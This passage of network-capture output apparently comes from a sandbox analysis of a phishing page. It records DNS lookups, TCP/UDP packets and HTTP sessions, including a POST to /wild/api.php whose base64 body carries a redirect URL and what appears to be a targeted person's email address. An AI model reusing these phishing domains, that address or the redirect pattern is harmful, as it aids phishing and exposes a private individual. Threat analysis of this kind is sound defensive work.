May 12, 2021 21:52:07.015682936 CEST	49718	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:07.054857016 CEST	80	49720	103.120.64.61	192.168.2.3
May 12, 2021 21:52:07.054949045 CEST	49720	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:07.215785980 CEST	80	49717	103.120.64.61	192.168.2.3
May 12, 2021 21:52:07.309489012 CEST	80	49717	103.120.64.61	192.168.2.3
May 12, 2021 21:52:07.319628954 CEST	80	49717	103.120.64.61	192.168.2.3
May 12, 2021 21:52:07.319717884 CEST	49717	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:08.368604898 CEST	49717	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:08.382438898 CEST	49718	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:08.575615883 CEST	80	49717	103.120.64.61	192.168.2.3
May 12, 2021 21:52:08.586034060 CEST	80	49718	103.120.64.61	192.168.2.3
May 12, 2021 21:52:08.679579020 CEST	80	49717	103.120.64.61	192.168.2.3
May 12, 2021 21:52:08.694844007 CEST	80	49718	103.120.64.61	192.168.2.3
May 12, 2021 21:52:08.694885015 CEST	80	49718	103.120.64.61	192.168.2.3
May 12, 2021 21:52:08.695022106 CEST	49718	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:08.695363045 CEST	80	49717	103.120.64.61	192.168.2.3
May 12, 2021 21:52:08.696197987 CEST	49717	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:08.707025051 CEST	80	49718	103.120.64.61	192.168.2.3
May 12, 2021 21:52:08.747422934 CEST	49718	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:08.791168928 CEST	49732	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:08.791688919 CEST	49733	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:08.833034992 CEST	443	49732	172.67.150.89	192.168.2.3
May 12, 2021 21:52:08.833129883 CEST	49732	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:08.833581924 CEST	49732	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:08.834338903 CEST	443	49733	172.67.150.89	192.168.2.3
May 12, 2021 21:52:08.834485054 CEST	49733	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:08.834650040 CEST	49733	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:08.874294043 CEST	443	49732	172.67.150.89	192.168.2.3
May 12, 2021 21:52:08.875468969 CEST	443	49733	172.67.150.89	192.168.2.3
May 12, 2021 21:52:08.880964041 CEST	443	49732	172.67.150.89	192.168.2.3
May 12, 2021 21:52:08.880992889 CEST	443	49732	172.67.150.89	192.168.2.3
May 12, 2021 21:52:08.881064892 CEST	49732	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:08.884248972 CEST	443	49733	172.67.150.89	192.168.2.3
May 12, 2021 21:52:08.884269953 CEST	443	49733	172.67.150.89	192.168.2.3
May 12, 2021 21:52:08.884407043 CEST	49733	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:09.051784992 CEST	49732	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:09.052576065 CEST	49733	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:09.052634001 CEST	49733	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:09.052735090 CEST	49732	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:09.053086996 CEST	49732	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:09.092827082 CEST	443	49732	172.67.150.89	192.168.2.3
May 12, 2021 21:52:09.092863083 CEST	443	49732	172.67.150.89	192.168.2.3
May 12, 2021 21:52:09.093267918 CEST	443	49732	172.67.150.89	192.168.2.3
May 12, 2021 21:52:09.093323946 CEST	49732	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:09.093348026 CEST	443	49732	172.67.150.89	192.168.2.3
May 12, 2021 21:52:09.093379974 CEST	443	49733	172.67.150.89	192.168.2.3
May 12, 2021 21:52:09.095604897 CEST	443	49733	172.67.150.89	192.168.2.3
May 12, 2021 21:52:09.095724106 CEST	49733	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:09.134176970 CEST	443	49732	172.67.150.89	192.168.2.3
May 12, 2021 21:52:09.134398937 CEST	49732	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:09.593368053 CEST	443	49732	172.67.150.89	192.168.2.3
May 12, 2021 21:52:09.593447924 CEST	443	49732	172.67.150.89	192.168.2.3
May 12, 2021 21:52:09.593571901 CEST	49732	443	192.168.2.3	172.67.150.89
May 12, 2021 21:52:09.864375114 CEST	49738	443	192.168.2.3	192.254.185.127
May 12, 2021 21:52:09.864891052 CEST	49739	443	192.168.2.3	192.254.185.127
May 12, 2021 21:52:09.894413948 CEST	49740	443	192.168.2.3	192.254.185.127
May 12, 2021 21:52:10.051014900 CEST	443	49738	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.051150084 CEST	49738	443	192.168.2.3	192.254.185.127
May 12, 2021 21:52:10.051347971 CEST	443	49739	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.051429987 CEST	49738	443	192.168.2.3	192.254.185.127
May 12, 2021 21:52:10.051482916 CEST	49739	443	192.168.2.3	192.254.185.127
May 12, 2021 21:52:10.051706076 CEST	49739	443	192.168.2.3	192.254.185.127
May 12, 2021 21:52:10.083511114 CEST	443	49740	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.083910942 CEST	49740	443	192.168.2.3	192.254.185.127
May 12, 2021 21:52:10.084141970 CEST	49740	443	192.168.2.3	192.254.185.127
May 12, 2021 21:52:10.090663910 CEST	49741	443	192.168.2.3	142.250.185.65
May 12, 2021 21:52:10.141226053 CEST	443	49741	142.250.185.65	192.168.2.3
May 12, 2021 21:52:10.146687031 CEST	49741	443	192.168.2.3	142.250.185.65
May 12, 2021 21:52:10.146878958 CEST	49741	443	192.168.2.3	142.250.185.65
May 12, 2021 21:52:10.197484970 CEST	443	49741	142.250.185.65	192.168.2.3
May 12, 2021 21:52:10.204538107 CEST	443	49741	142.250.185.65	192.168.2.3
May 12, 2021 21:52:10.204575062 CEST	443	49741	142.250.185.65	192.168.2.3
May 12, 2021 21:52:10.204621077 CEST	443	49741	142.250.185.65	192.168.2.3
May 12, 2021 21:52:10.204649925 CEST	443	49741	142.250.185.65	192.168.2.3
May 12, 2021 21:52:10.204679012 CEST	443	49741	142.250.185.65	192.168.2.3
May 12, 2021 21:52:10.204715014 CEST	443	49741	142.250.185.65	192.168.2.3
May 12, 2021 21:52:10.204843044 CEST	49741	443	192.168.2.3	142.250.185.65
May 12, 2021 21:52:10.204888105 CEST	49741	443	192.168.2.3	142.250.185.65
May 12, 2021 21:52:10.204895020 CEST	49741	443	192.168.2.3	142.250.185.65
May 12, 2021 21:52:10.237637043 CEST	443	49738	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.237786055 CEST	443	49739	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.241597891 CEST	443	49738	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.241612911 CEST	443	49738	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.241626978 CEST	443	49738	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.241725922 CEST	49738	443	192.168.2.3	192.254.185.127
May 12, 2021 21:52:10.268798113 CEST	443	49740	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.273806095 CEST	443	49739	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.273858070 CEST	443	49739	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.273880959 CEST	443	49739	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.273912907 CEST	443	49740	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.273938894 CEST	443	49740	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.273969889 CEST	443	49740	192.254.185.127	192.168.2.3
May 12, 2021 21:52:10.274046898 CEST	49739	443	192.168.2.3	192.254.185.127

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 21:51:54.478791952 CEST	53	60985	8.8.8.8	192.168.2.3
May 12, 2021 21:51:55.259218931 CEST	50200	53	192.168.2.3	8.8.8.8
May 12, 2021 21:51:55.332751036 CEST	53	50200	8.8.8.8	192.168.2.3
May 12, 2021 21:51:55.580451965 CEST	51281	53	192.168.2.3	8.8.8.8
May 12, 2021 21:51:55.629471064 CEST	53	51281	8.8.8.8	192.168.2.3
May 12, 2021 21:51:56.382713079 CEST	49199	53	192.168.2.3	8.8.8.8
May 12, 2021 21:51:56.431963921 CEST	53	49199	8.8.8.8	192.168.2.3
May 12, 2021 21:51:57.129653931 CEST	50620	53	192.168.2.3	8.8.8.8
May 12, 2021 21:51:57.181529045 CEST	53	50620	8.8.8.8	192.168.2.3
May 12, 2021 21:51:57.787756920 CEST	64938	53	192.168.2.3	8.8.8.8
May 12, 2021 21:51:57.846601963 CEST	53	64938	8.8.8.8	192.168.2.3
May 12, 2021 21:51:58.018450022 CEST	60152	53	192.168.2.3	8.8.8.8
May 12, 2021 21:51:58.067265034 CEST	53	60152	8.8.8.8	192.168.2.3
May 12, 2021 21:51:58.965034008 CEST	57544	53	192.168.2.3	8.8.8.8
May 12, 2021 21:51:59.016700983 CEST	53	57544	8.8.8.8	192.168.2.3
May 12, 2021 21:52:00.084662914 CEST	55984	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:00.136344910 CEST	53	55984	8.8.8.8	192.168.2.3
May 12, 2021 21:52:01.055619955 CEST	64185	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:01.112994909 CEST	53	64185	8.8.8.8	192.168.2.3
May 12, 2021 21:52:03.205041885 CEST	65110	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:03.254101992 CEST	53	65110	8.8.8.8	192.168.2.3
May 12, 2021 21:52:05.353353977 CEST	53023	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:05.402190924 CEST	53	53023	8.8.8.8	192.168.2.3
May 12, 2021 21:52:06.601459026 CEST	57084	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:06.604187965 CEST	58823	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:06.604635000 CEST	57568	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:06.605823994 CEST	50540	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:06.609030962 CEST	54366	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:06.620131016 CEST	53034	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:06.658747911 CEST	53	57084	8.8.8.8	192.168.2.3
May 12, 2021 21:52:06.662379026 CEST	53	57568	8.8.8.8	192.168.2.3
May 12, 2021 21:52:06.664227962 CEST	53	58823	8.8.8.8	192.168.2.3
May 12, 2021 21:52:06.668903112 CEST	53	53034	8.8.8.8	192.168.2.3
May 12, 2021 21:52:06.670945883 CEST	53	54366	8.8.8.8	192.168.2.3
May 12, 2021 21:52:06.807466030 CEST	53	50540	8.8.8.8	192.168.2.3
May 12, 2021 21:52:07.103241920 CEST	57762	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:07.153664112 CEST	55435	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:07.168256044 CEST	53	57762	8.8.8.8	192.168.2.3
May 12, 2021 21:52:07.212389946 CEST	53	55435	8.8.8.8	192.168.2.3
May 12, 2021 21:52:07.373424053 CEST	50713	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:07.423918962 CEST	53	50713	8.8.8.8	192.168.2.3
May 12, 2021 21:52:07.466629982 CEST	56132	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:07.515161991 CEST	53	56132	8.8.8.8	192.168.2.3
May 12, 2021 21:52:07.649343967 CEST	58987	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:07.707952023 CEST	53	58987	8.8.8.8	192.168.2.3
May 12, 2021 21:52:08.444149971 CEST	56579	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:08.492925882 CEST	53	56579	8.8.8.8	192.168.2.3
May 12, 2021 21:52:08.728679895 CEST	60633	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:08.788517952 CEST	53	60633	8.8.8.8	192.168.2.3
May 12, 2021 21:52:09.641731977 CEST	61946	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:09.767828941 CEST	64910	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:09.817604065 CEST	53	64910	8.8.8.8	192.168.2.3
May 12, 2021 21:52:09.861407995 CEST	53	61946	8.8.8.8	192.168.2.3
May 12, 2021 21:52:10.022999048 CEST	52123	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:10.083476067 CEST	53	52123	8.8.8.8	192.168.2.3
May 12, 2021 21:52:10.939908981 CEST	56130	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:11.007777929 CEST	53	56130	8.8.8.8	192.168.2.3
May 12, 2021 21:52:11.523365974 CEST	56338	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:11.581120968 CEST	53	56338	8.8.8.8	192.168.2.3
May 12, 2021 21:52:12.369905949 CEST	59420	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:12.418879986 CEST	53	59420	8.8.8.8	192.168.2.3
May 12, 2021 21:52:13.399977922 CEST	58784	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:13.448812008 CEST	53	58784	8.8.8.8	192.168.2.3
May 12, 2021 21:52:15.189244986 CEST	56803	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:15.239085913 CEST	53	56803	8.8.8.8	192.168.2.3
May 12, 2021 21:52:15.805241108 CEST	57145	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:15.854080915 CEST	53	57145	8.8.8.8	192.168.2.3
May 12, 2021 21:52:16.356003046 CEST	55359	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:16.413474083 CEST	53	55359	8.8.8.8	192.168.2.3
May 12, 2021 21:52:17.362986088 CEST	58306	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:17.436253071 CEST	53	58306	8.8.8.8	192.168.2.3
May 12, 2021 21:52:18.203577042 CEST	64124	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:18.269054890 CEST	53	64124	8.8.8.8	192.168.2.3
May 12, 2021 21:52:20.456265926 CEST	49361	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:20.505084038 CEST	53	49361	8.8.8.8	192.168.2.3
May 12, 2021 21:52:21.783143044 CEST	63150	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:21.837841034 CEST	53	63150	8.8.8.8	192.168.2.3
May 12, 2021 21:52:22.306937933 CEST	53279	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:22.356255054 CEST	53	53279	8.8.8.8	192.168.2.3
May 12, 2021 21:52:22.507644892 CEST	56881	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:22.831231117 CEST	53	56881	8.8.8.8	192.168.2.3
May 12, 2021 21:52:23.345041990 CEST	53642	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:23.396945000 CEST	53	53642	8.8.8.8	192.168.2.3
May 12, 2021 21:52:27.458251953 CEST	55667	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:27.531218052 CEST	53	55667	8.8.8.8	192.168.2.3
May 12, 2021 21:52:33.678685904 CEST	54833	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:33.741528988 CEST	53	54833	8.8.8.8	192.168.2.3
May 12, 2021 21:52:40.201049089 CEST	62476	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:40.286900043 CEST	53	62476	8.8.8.8	192.168.2.3
May 12, 2021 21:52:50.105154991 CEST	61477	53	192.168.2.3	8.8.8.8
May 12, 2021 21:52:50.166197062 CEST	53	61477	8.8.8.8	192.168.2.3
May 12, 2021 21:53:01.567310095 CEST	61633	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:01.626379013 CEST	53	61633	8.8.8.8	192.168.2.3
May 12, 2021 21:53:02.767664909 CEST	55949	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:02.830009937 CEST	53	55949	8.8.8.8	192.168.2.3
May 12, 2021 21:53:03.399158001 CEST	49342	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:03.464179993 CEST	53	49342	8.8.8.8	192.168.2.3
May 12, 2021 21:53:03.647131920 CEST	56253	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:03.704900980 CEST	53	56253	8.8.8.8	192.168.2.3
May 12, 2021 21:53:03.950715065 CEST	49667	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:03.999344110 CEST	53	49667	8.8.8.8	192.168.2.3
May 12, 2021 21:53:13.877302885 CEST	55439	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:13.878113985 CEST	57069	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:13.936289072 CEST	53	55439	8.8.8.8	192.168.2.3
May 12, 2021 21:53:13.936515093 CEST	53	57069	8.8.8.8	192.168.2.3
May 12, 2021 21:53:23.957221031 CEST	57659	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:24.035089970 CEST	53	57659	8.8.8.8	192.168.2.3
May 12, 2021 21:53:24.174312115 CEST	54717	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:24.231735945 CEST	53	54717	8.8.8.8	192.168.2.3
May 12, 2021 21:53:24.489912987 CEST	63975	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:24.550184011 CEST	53	63975	8.8.8.8	192.168.2.3
May 12, 2021 21:53:27.164195061 CEST	56639	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:27.228131056 CEST	53	56639	8.8.8.8	192.168.2.3
May 12, 2021 21:53:30.876449108 CEST	51856	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:30.933548927 CEST	53	51856	8.8.8.8	192.168.2.3
May 12, 2021 21:53:48.697654963 CEST	56546	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:48.766196966 CEST	53	56546	8.8.8.8	192.168.2.3
May 12, 2021 21:53:48.906780005 CEST	62152	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:48.966289043 CEST	53	62152	8.8.8.8	192.168.2.3
May 12, 2021 21:53:50.798147917 CEST	53470	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:50.863468885 CEST	53	53470	8.8.8.8	192.168.2.3
May 12, 2021 21:53:54.026176929 CEST	56446	53	192.168.2.3	8.8.8.8
May 12, 2021 21:53:54.095814943 CEST	53	56446	8.8.8.8	192.168.2.3
May 12, 2021 21:54:09.288897038 CEST	59631	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:09.346375942 CEST	53	59631	8.8.8.8	192.168.2.3
May 12, 2021 21:54:33.888994932 CEST	55515	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:33.946410894 CEST	53	55515	8.8.8.8	192.168.2.3
May 12, 2021 21:54:34.085899115 CEST	64547	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:34.146112919 CEST	53	64547	8.8.8.8	192.168.2.3
May 12, 2021 21:54:52.048141003 CEST	51759	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:52.170245886 CEST	53	51759	8.8.8.8	192.168.2.3
May 12, 2021 21:54:52.676018953 CEST	59207	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:52.737891912 CEST	53	59207	8.8.8.8	192.168.2.3
May 12, 2021 21:54:53.205487013 CEST	54269	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:53.306514025 CEST	53	54269	8.8.8.8	192.168.2.3
May 12, 2021 21:54:53.689789057 CEST	54856	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:53.747790098 CEST	53	54856	8.8.8.8	192.168.2.3
May 12, 2021 21:54:54.196794033 CEST	64140	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:54.254391909 CEST	53	64140	8.8.8.8	192.168.2.3
May 12, 2021 21:54:54.693830967 CEST	62271	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:54.751166105 CEST	53	62271	8.8.8.8	192.168.2.3
May 12, 2021 21:54:55.124785900 CEST	57404	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:55.184048891 CEST	53	57404	8.8.8.8	192.168.2.3
May 12, 2021 21:54:55.806497097 CEST	62997	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:55.869004965 CEST	53	62997	8.8.8.8	192.168.2.3
May 12, 2021 21:54:56.527144909 CEST	57712	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:56.575953960 CEST	53	57712	8.8.8.8	192.168.2.3
May 12, 2021 21:54:57.091406107 CEST	60065	53	192.168.2.3	8.8.8.8
May 12, 2021 21:54:57.151753902 CEST	53	60065	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 21:52:06.605823994 CEST	192.168.2.3	8.8.8.8	0x7259	Standard query (0)	esd.rwbdg.com	A (IP address)	IN (0x0001)
May 12, 2021 21:52:07.373424053 CEST	192.168.2.3	8.8.8.8	0x42cc	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)
May 12, 2021 21:52:08.728679895 CEST	192.168.2.3	8.8.8.8	0xbf22	Standard query (0)	writerly.ca	A (IP address)	IN (0x0001)
May 12, 2021 21:52:09.641731977 CEST	192.168.2.3	8.8.8.8	0x9b73	Standard query (0)	kristenbakercoach.com	A (IP address)	IN (0x0001)
May 12, 2021 21:52:10.022999048 CEST	192.168.2.3	8.8.8.8	0x33c3	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)
May 12, 2021 21:52:21.783143044 CEST	192.168.2.3	8.8.8.8	0xa8ee	Standard query (0)	i0.wp.com	A (IP address)	IN (0x0001)
May 12, 2021 21:52:22.507644892 CEST	192.168.2.3	8.8.8.8	0xf8db	Standard query (0)	www.eaqarat-iran.ir	A (IP address)	IN (0x0001)
May 12, 2021 21:52:27.458251953 CEST	192.168.2.3	8.8.8.8	0x89a4	Standard query (0)	www.eaqarat-iran.ir	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 21:52:06.807466030 CEST	8.8.8.8	192.168.2.3	0x7259	No error (0)	esd.rwbdg.com		103.120.64.61	A (IP address)	IN (0x0001)
May 12, 2021 21:52:07.423918962 CEST	8.8.8.8	192.168.2.3	0x42cc	No error (0)	code.jquery.com	cds.s5x3j6q5.hwcdn.net		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 21:52:08.788517952 CEST	8.8.8.8	192.168.2.3	0xbf22	No error (0)	writerly.ca		172.67.150.89	A (IP address)	IN (0x0001)
May 12, 2021 21:52:08.788517952 CEST	8.8.8.8	192.168.2.3	0xbf22	No error (0)	writerly.ca		104.21.57.222	A (IP address)	IN (0x0001)
May 12, 2021 21:52:09.861407995 CEST	8.8.8.8	192.168.2.3	0x9b73	No error (0)	kristenbakercoach.com		192.254.185.127	A (IP address)	IN (0x0001)
May 12, 2021 21:52:10.083476067 CEST	8.8.8.8	192.168.2.3	0x33c3	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 21:52:10.083476067 CEST	8.8.8.8	192.168.2.3	0x33c3	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.65	A (IP address)	IN (0x0001)
May 12, 2021 21:52:21.837841034 CEST	8.8.8.8	192.168.2.3	0xa8ee	No error (0)	i0.wp.com		192.0.77.2	A (IP address)	IN (0x0001)
May 12, 2021 21:52:22.831231117 CEST	8.8.8.8	192.168.2.3	0xf8db	No error (0)	www.eaqarat-iran.ir	eaqarat-iran.ir		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 21:52:22.831231117 CEST	8.8.8.8	192.168.2.3	0xf8db	No error (0)	eaqarat-iran.ir		5.144.130.32	A (IP address)	IN (0x0001)
May 12, 2021 21:52:27.531218052 CEST	8.8.8.8	192.168.2.3	0x89a4	No error (0)	www.eaqarat-iran.ir	eaqarat-iran.ir		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 21:52:27.531218052 CEST	8.8.8.8	192.168.2.3	0x89a4	No error (0)	eaqarat-iran.ir		5.144.130.32	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

esd.rwbdg.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49717	103.120.64.61	80	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 21:52:07.012767076 CEST	1244	OUT	GET / HTTP/1.1 Host: esd.rwbdg.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
May 12, 2021 21:52:07.309489012 CEST	1347	IN	HTTP/1.1 200 OK Date: Wed, 12 May 2021 19:52:07 GMT Server: Apache Content-Encoding: gzip Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 30 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 93 5d 6f d3 30 14 86 ef fb 2b 2c 33 69 ad b6 da 74 55 d9 e8 92 4a c0 84 10 42 6c 63 ad 2a 84 b8 70 6c af 76 97 d8 c1 3e 4d 1a 4d fb ef 73 3e a0 1f c2 37 76 7c 9e 73 de f7 1c 39 91 82 2c 9d f5 22 25 99 98 f5 7a 3d 14 56 04 1a 52 39 8b 68 bb b7 77 99 04 86 b8 62 ce 4b 88 f1 62 fe 79 78 85 f7 43 86 65 32 c6 85 96 65 6e 1d 60 c4 ad 01 69 02 5a 6a 01 2a 16 b2 d0 5c 0e 9b 8f 73 a4 8d 06 cd d2 a1 e7 2c 95 f1 e8 6f a1 84 79 89 94 93 8f 31 56 00 f9 94 52 e9 05 71 65 22 56 84 db 0c 23 5a 5b 8c 3c 54 a9 44 50 e5 41 10 e4 16 28 f7 be 2b d1 8b 68 13 6d 38 da 36 15 25 56 54 61 f3 dc e9 1c 90 77 bc 2d ef 43 7d 6e 85 24 eb 3f 1b e9 aa 5a 81 b6 c7 e1 98 4c c8 88 ac 3d d6 a1 89 95 d3 50 c5 d8 2b 76 31 79 37 bc 5f da cb 6f 37 c5 36 59 ce 2f 20 49 ee df 5f 7e 9c 8c ab af e6 e7 62 bc 54 5f e8 a7 ab 8a 27 3f 3e 3c ad ef 6e 82 0c e2 ce 7a 6f 9d 5e 69 13 63 66 ac a9 32 bb 09 66 83 cd c6 cd ce d6 5e 3b 6b 56 b0 f6 b6 eb ea a4 2f 2c df 64 61 9c 03 e2 42 4f 55 ff 71 63 38 68 6b fa 83 e7 86 a8 57 c1 1c aa 1c 8a 51 a9 8d b0 25 49 2d 67 35 43 ea 89 5e 1f 60 4e fa c0 55 8e f8 3c d5 d0 c7 6f f0 e0 10 90 19 d3 69 40 02 f8 eb ed ef e3 e4 3c 44 1a a2 cb 3f 0d a3 3b 3d aa 00 4a 35 f9 79 c8 3f 6b 80 e3 b8 dc b8 5a 22 80 67 98 96 3a 15 94 e5 9a e4 2a c7 87 64 aa cd 53 67 65 b4 67 e5 84 b0 35 db f6 77 fd b7 ab 9e e3 14 e1 bb db 87 39 3e 3f 8a 05 c1 69 27 7c 1c 12 0c d8 14 3d f3 85 97 ee 3b 2b 1e a6 8d ec cb 3f ea 65 40 84 35 72 37 78 94 f9 15 1a a0 43 f9 ff 4d 3e 58 0f e8 f5 5e a5 f6 5c ef 7b cf 80 76 af 94 36 3f e4 2b e5 62 be 25 97 03 00 00 0d 0a Data Ascii: 209m]o0+,3itUJBlcplv>MMs>7v\|s9,"%z=VR9hwbKbyxCe2en`iZj\s,oy1VRqe"V#Z[<TDPA(+hm86%VTaw-C}n$?ZL=P+v1y7_o76Y/ I_~bT_'?><nzo^icf2f^;kV/,daBOUqc8hkWQ%I-g5C^`NU<oi@<D?;=J5y?kZ"g:*dSgeg5w9>?i'\|=;+?e@5r7xCM>X^\{v6?+b%
May 12, 2021 21:52:08.368604898 CEST	2238	OUT	POST /wild/api.php HTTP/1.1 Host: esd.rwbdg.com Connection: keep-alive Content-Length: 64 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://esd.rwbdg.com Referer: http://esd.rwbdg.com/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Data Raw: 63 55 73 65 72 4e 61 76 53 3d 61 48 52 30 63 48 4d 36 4c 79 39 33 63 6d 6c 30 5a 58 4a 73 65 53 35 6a 59 53 38 6a 63 47 68 6c 5a 57 74 6c 51 47 56 7a 5a 43 35 33 59 53 35 6e 62 33 59 25 33 44 Data Ascii: cUserNavS=aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y%3D
